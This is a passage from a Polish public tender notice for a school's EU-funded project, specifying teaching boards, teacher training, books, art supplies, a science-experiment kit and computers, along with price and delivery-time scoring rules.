minimum 30 stron, format A4, środek kolor. Książka powinna składać się wyłącznie z zadań rozwijających pamięć: zakładki osobiste, spirale pamięciowe, zakładki liczbowe. <br/>e)	Książka ćwiczeń: czytanie fotograficzne, okładka 250 gram, druk kolor, minimum 20 stron, format A4, środek kolor. Książka powinna składać się wyłącznie z zadań do przyspieszania tempa czytania. <br/>f)	Teczka na materiały druk kolor z zadrukowanymi logotypami województwa łódzkiego (EFS+). <br/>g)	Naklejki samoprzylepne, format wykrojnika A4, druk kolor, docięte laserowo, liczba naklejek minimum 30 sztuk. Obrazki na naklejkach powiązane z tematami zajęć. <br/><br/>Ad 2. Dostawa 10 tablic wielkoformatowych do rozwoju kompetencji kluczowych. Komplet tablic składa składa się z poniższych elementów: <br/>a)	Tablice do rozwijania kreatywności i innowacyjności: 2 sztuki format 90 na 120 cm, magnetyczne, zawierające minimum 35 kwadratów z zadrukowanymi literami alfabetu i cyframi. <br/>b)	Tablice spirale pamięci: 2 sztuki sztuki format 90 na 120 cm, druk kolor, oprawa metalowa, logotypy zadrukowane, zawierające minimum 24 kolorowe pola, logotypy zadrukowane, tablica umożliwiająca wielokrotne zapisywanie i ścieranie treści, do tablicy są dołączone minimum 40 tabliczek magnetycznych z obrazkami przedmiotów codziennego użytku. <br/>c)	Tablice zakładki osobiste: 2 sztuki, format 90 na 120 cm, z 60 tabliczkami magnetycznymi formatu A6 (30 tabliczek ze zwierzętami i produktami spożywczymi), tablica umożliwiająca wielokrotne zapisywanie i ścieranie treści. <br/>d)	Tablice do notowania nielinearnego: 2 sztuki: format 90 na 120 cm, magnetyczne z zadrukowaną mapą myśli składającą się z minimum 32 gałęzi, do mapy dołączone są magnetyczne tabliczki formatu A6 z zadrukowanymi tematami zajęć. <br/><br/>Ad 3. Przeprowadzenie szkolenia dla 20 nauczycieli w siedzibie Realizatora projektu ZSO w Sędziejowicach. Informacje na temat szkolenia: 1 grupa szkoleniowa, czas trwania szkolenia 8h. Tematyka szkolenia: podstawy teorii szybkiego uczenia się i czytania, technik pamięci, koncentracji, ćwiczenia w prowadzeniu zajęć z uczniami, praca na materiałach edukacyjnych i sprzętach nabytych w ramach projektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty w ramach części 2, Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>a. Cena – 60%,<br/>b. Termin realizacji dostawy – 40%.<br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/>4. W zakresie części 2 za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa 1 zestawu książek. <br/>Przedmiotem zamówienia jest dostawa zestawu książek do realizatora projektu ZSO <br/>w Sędziejowicach. Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne <br/>od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane. Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladu uszkodzenia, <br/>w oryginalnych opakowaniach producenta, z widocznym logo, symbolem produktu. Dostarczone materiały muszą być zgodnie z obowiązującymi normami i posiadać wymagane atesty, certyfikaty, aprobaty techniczne, deklaracje zgodności, świadectwa bezpieczeństwa, homologacje, licencje itp. <br/>Skład zestawu książek: <br/>-8 sztuk Pod ziemią, pod wodą, <br/>-8 sztuk Ptaki świata, <br/>-8 sztuk Nela i tajemnice świata, <br/>-8 stuk Encyklopedia zwierząt świata, <br/>-8 sztuk Zwierzęta świata, <br/>-8 sztuk Cuda natury najpiękniejsze miejsca, <br/>-8 sztuk cuda świata, <br/>-8 sztuk Atlasy świata, <br/>-8 sztuk Ilustrowany atlas dla dzieci, <br/>-8 sztuk Cuda kultury </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty w ramach części 3, Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>a. Cena – 60%,<br/>b. Termin realizacji dostawy – 40%.<br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/>4. W zakresie części 3 za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa 1 zestawu materiałów plastycznych: przedmiotem zamówienia jest dostawa pomocy do wykonywania prac plastycznych do realizatora projektu ZSO w Sędziejowicach Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane. Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladu uszkodzenia w oryginalnych opakowaniach producenta, z widocznym logo, symbolem produktu. Dostarczone materiały muszą być zgodnie z obowiązującymi normami i posiadać wymagane atesty, certyfikaty, aprobaty techniczne, deklaracje zgodności, świadectwa bezpieczeństwa, homologacje, licencje itp. <br/>Skład zestawu: <br/>⁃ kolorowy papier 10 ryz (przy czym jedna ryza odpowiada – 500 arkuszy), gramatura kartek 80 g/m²,odpowiednie do drukarek laserowych i atramentowych; <br/>⁃ 60 sztuk kleju w sztyfcie 20g Magic (wysokiej jakości klej w sztyfcie, bezbarwny i bezwonny, zmywalny i niebrudzący, nie zawiera kwasów ani rozpuszczalników; <br/>⁃ pisaki 10 opakowań: w 1 opakowaniu 36 kolorów (pigmenty najwyższej jakości gwarantują wyraziste odcienie, okrągła końcówka umożliwia dokładne pokrywanie dużych powierzchni); <br/>⁃ kleje brokatowe 9 opakowań (w miękkich tubkach, wygodne i łatwe w użyciu dzięki specjalnej końcówce umożliwiającej precyzyjną aplikację); <br/>⁃ farby plakatowe 12 kolorów 20 sztuk (charakteryzujące się głębokimi, nasyconymi barwami, które doskonale kryją powierzchnię. Nadające pracom wyjątkową intensywność i wyrazistość.);<br/>⁃ pędzle 4 opakowania, w opakowaniu 40 sztuk pędzli (wielozadaniowe - przy ich pomocy można osiągać różne efekty i używać ich do wielu technik, trwałe - jakość wykonania przekłada się na czas użytkowania); <br/>⁃ plastelina 40 sztuk -18 kolorów ( mocna tekstura, giętka i elastyczna, możliwość modelowania w niskich temperaturach); <br/>⁃ gliny samoutwardzalne 12 sztuk (masa miękka i gładka, niezwykle plastyczna); <br/>⁃ mąka pszenna 10 kilogramów (dobrej jakości o białym kolorze z odcieniem kremowym <br/>lub jasno szarymi); <br/>⁃ sól do masy plastycznej 10 kilogramów (o drobnej konsystencji); <br/>⁃ brystol 25 arkuszy (dużej gramaturze i sztywności, charakteryzujący się gładką powierzchnią i doskonałą jakością); <br/>⁃ arkusze szarego papieru 200 sztuk (o gubej gęstości, gramatura 80 g/m²), <br/>⁃ kredki 12 kompletów, kredki 24 kolory w opakowaniu (pigment najwyższej jakości, optymalne nasycenie kolorem, możliwość zróżnicowanego cieniowania rysunków, odpowiednio wyprofilowany kształt, jedynie wysokogatunkowy materiał); <br/>⁃ bibuła marszczona 5 opakowań, w 1 opakowaniu 10 rolek, (odpowiednio marszczona i elastyczna, odporna na rozerwanie, dodatkowo taka co nie brudzi rąk, nawet gdy są spocone czy wilgotne); <br/>⁃ papier ksero 30 ryz (przy czym jedna ryza odpowiada – 500 arkuszy x 7) - (najlżejsza gramatura (60-80 g/m²), format A4, powłoka matowa (matte). ⁃ wstążka satynowa 20 sztuk: różne kolory 25 mm 32 mb. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty w ramach części 4, Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>a. Cena – 60%,<br/>b. Termin realizacji dostawy – 40%.<br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/>4. W zakresie części 4 za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa 1 zestawu do przeprowadzania eksperymentów. <br/>Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do realizacji eksperymentów do realizatora projektu ZSO w Sędziejowicach. Wszystkie materiały stanowiące przedmiot zamówienia muszą być oryginalne, profesjonalne i fabrycznie nowe, wysokiej jakości, sprawne, wolne od jakichkolwiek wad fizycznych, jak również od jakichkolwiek wad prawnych i roszczeń osób trzecich, nie używane, nie powystawowe, nie regenerowane. Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladu uszkodzenia, w oryginalnych opakowaniach producenta, z widocznym logo, symbolem produktu. Dostarczone materiały muszą być zgodnie z obowiązującymi normami i posiadać wymagane atesty, certyfikaty, aprobaty techniczne, deklaracje zgodności, świadectwa bezpieczeństwa, homologacje, licencje itp. <br/>Skład zestawu: <br/>- probówki 20 szt., <br/>- kolby 5 szt 250 ml,<br/>- ocet 10 litrów,<br/>- soda oczyszczona 20 opakowań, <br/>- pieprz czarny mielony 20 opakowań ,<br/>- płyn do mycia naczyń 5 sztuk,<br/>- atrament niebieski 5 sztuk, <br/>- zimne ognie 10 opakowań, <br/>- mąkę pszenną 10 kg,<br/>- ziemniaczaną 10 kg,<br/>- olej 5 litrów, <br/>- świece light-on 100 sztuk, <br/>- proszek do pieczenia 10 opakowań, <br/>- kwasek cytrynowy 10 opakowań, <br/>- zapałki 20 opakowań, <br/>- mydło w płynie 10 sztuk, <br/>- perhydrol 1 litr, <br/>- nadmanganian potasu procek 0,5 kg,<br/>- folia aluminiowa 10 opakowań, <br/>- jodek potasu 1 szt., <br/>- gliceryna 2 sztuki, <br/>- terpentyna mineralna 1 litr, <br/>- wodorotlenek sodu 250 gram, <br/>- kolba stożkowa 3 sztuki 500 ml, <br/>- kolba stożkowa 3 sztuki 500ml, <br/>- bagietka szklana 5 x 300mm, <br/>- papierki wskaźnikowe pH 0-12 (100szt), <br/>- probówka szklana 15/16/160 mm z korkiem, <br/>- probówka szklana śr.11/12/100 mm, <br/>- nadmanganian potasu tabletki 100mg (30szt), <br/>- butelki na roztwory(szklane) 10 sztuk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty w ramach części 5, Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>a. Cena – 60%,<br/>b. Termin realizacji dostawy – 40%.<br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/>4. W zakresie części 5 za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa sprzętu TIK i programów specjalistycznych do prowadzenia zajęć. Zestaw składa się z poniższych elementów: <br/>1. 28 komputerów. Specyfikacja minimalna: Grafika:Intel HD Graphics 630, Pamięć RAM:8 GB, Dysk SSD SATA:240 GB, Nagrywarka DVD+/-RW Dual.<br/>2. 28 monitorów Led. Specyfikacja minimalna: matryca LED, IPS, , panel Full HD, kąt widzenia wynoszący 178/178 stopni, tryb obrotu do 90 stopni przekątna ekranu [cal]: 23.8, przekątna ekranu [cm]: 60.5, rozdzielczość ekranu: 1920 x 1080, proporcje ekranu: 16:9 podświetlenie ekranu: WLED.<br/>3. 28 kabli HDMI. Specyfikacja minimalna: Standard HDMI v2.0b, Przepustowość do 18 Gbit/s, Obsługiwana rozdzielczość do 4K, Długość 2 metry.<br/>4. 28 zestaw klawiatura + myszka. Specyfikacja minimalna: Typ klawiatury:Membranowa, Typ myszy: Optyczna Maksymalna rozdzielczość: 1000 dpi.<br/>5. 28 systemów operacyjnych MS Windows 11 wraz z pakietem Office. Specyfikacja minimalna: wersja pro 64 bitowa.<br/>6. 28 podkładek pod mysz. <br/>7. 1 serwer Dell PowerEdge. Specyfikacja minimalna pamięć RAM 16GB, maks obsługi pamięci 120 RAM, dysk 2000GB, grafika Martox G200. <br/>8.	1 oprogramowanie serwerowe MW Server. <br/>Minimalna specyfikacja:wersja standard 16 CORE, oprogramowanie do pracy w chmurze <br/>9.	1 zasilacz Line. <br/>Minimalna specyfikacja: Interfejs: IEC C13, Moc pozorna [VA]: 2200, Moc skuteczna [W]: 1320, Napięcie wejściowe (zakres): 165 - 290 Czas przełączania [ms]: 2, 4, Topologia: Line Interactive VI. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span 